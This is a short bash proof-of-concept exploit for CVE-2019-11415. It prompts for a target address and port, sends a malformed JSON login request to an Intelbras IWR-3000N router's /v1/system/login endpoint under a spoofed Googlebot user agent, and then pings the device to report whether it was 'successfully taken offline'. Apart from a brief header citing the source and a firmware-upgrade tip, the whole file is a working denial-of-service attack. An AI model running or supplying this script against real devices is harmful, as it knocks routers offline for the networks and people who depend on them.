#/bin/bash # PoC based on CVE-2019-11415 created by Social Engineering Neo. # # Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/ # # A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login. # # Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue. clear read -p "Enter Target Address Followed by Port: " target port # localhost 8080 alive=$(ping -c 1 $target | grep icmp* | wc -l) if [ "$alive" -eq 0 ]; then echo Target May be Offline or Blocking ICMP requests. read -p "Would you Like to Proceed? (Y/n): " ans if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then clear exit fi fi if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login) else echo "Incorrect Port." fi clear alive=$(ping -c 1 $target | grep icmp* | wc -l) if [ "$alive" -eq 0 ]; then echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate. else echo Exploit Unsuccessfull, Target May Not be Vulnerable. fi